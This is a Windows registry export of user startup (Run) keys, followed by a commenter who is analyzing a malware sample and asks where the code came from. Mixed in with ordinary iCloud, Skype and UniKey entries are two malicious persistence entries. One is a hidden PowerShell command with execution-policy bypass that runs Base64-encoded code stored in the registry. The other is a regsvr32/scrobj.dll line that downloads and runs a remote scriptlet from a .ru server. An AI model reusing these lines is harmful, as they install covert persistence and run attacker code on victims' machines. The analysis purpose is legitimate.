startup_key.reg

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"iCloudPhotos"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudPhotos.exe"
"iCloudServices"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudServices.exe"
"UniKey"="C:\\Program Files\\UniKey\\UniKeyNT.exe"
"{C3A46F5D-381E-4E87-83B8-E06D4A32AD32}"="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\\Software\\Classes\\MTBLHVGZMZY').PSphLsFbvEgBoa)));"
"Skype"="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" /minimized /regrun"
"COM+"="regsvr32 /s /n /u /i:http://server2.bjdnxbgp3.ru/setup.xml scrobj.dll"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Speedup DelayLoad]
"UniKey"="C:\\Program Files\\UniKey\\UniKeyNT.exe"
"CocCoc Update"="\"C:\\Users\\XNK_DUNGLQ\\AppData\\Local\\CocCoc\\Update\\CocCocUpdate.exe\" /c"
"iCloudServices"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudServices.exe"
"AppleIEDAV"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\AppleIEDAV.exe"
"iCloudDrive"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudDrive.exe"
"iCloudPhotos"="C:\\Program Files\\Common Files\\Apple\\Internet Services\\iCloudPhotos.exe"

Where did you get this code from? I am analyzing a sample, which also has the "regsvr32 /s /n /u /i:http://server2.bjdnxbgp3.ru/setup.xml scrobj.dll" character, I would like to get more information, thanks.